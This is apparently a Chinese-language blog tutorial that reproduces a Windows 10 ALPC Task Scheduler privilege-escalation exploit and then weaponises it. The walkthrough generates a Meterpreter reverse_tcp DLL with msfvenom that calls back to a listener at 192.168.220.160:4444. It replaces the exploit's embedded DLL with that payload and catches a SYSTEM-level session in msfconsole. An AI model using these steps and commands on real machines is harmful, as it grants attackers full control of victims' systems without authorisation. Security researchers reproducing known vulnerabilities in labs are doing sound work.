1. 程式人生 > >Windows 10 提權漏洞復現及武器化利用

Windows 10 提權漏洞復現及武器化利用

專案地址:https://github.com/SandboxEscaper/randomrepo

相關工具的下載地址:

Process Explorer:https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer

CFF Explorer:https://ntcore.com/?page_id=388

復現:

開啟一個記事本和 Process Explorer

記事本的 pid 號為 1944

接下來利用漏洞

上圖的 1944 為記事本的 pid 號,回車

spoolsv.exe 下多了個程序樹

這個程序樹不會被 kill

右鍵 -> Kill Process Tree

當前程序為 System 程序

武器化利用

生成一個 dll 檔案

1

2

┌─[[email protected]]─[~]

└──╼ #msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.220.160 lport=4444 -f dll -o sch01ar.dll

把生成的 dll 檔案拿到 Windows 10 上

用 CFF Explorer 開啟原先的 ALPC-TaskSched-LPE.dll

點 Resource Editor

右鍵 Replace Resource

然後選擇 sch01ar.dll

儲存

是否覆蓋原檔案,選擇是

開啟 msf

1

2

┌─[[email protected]]─[~]

└──╼ #msfconsole

進行相關選項的配置,並開啟監聽

切換回 Windows 10

會彈出一個視窗

msf 返回了會話

msf exploit(handler) > sessions -i 1

system 許可權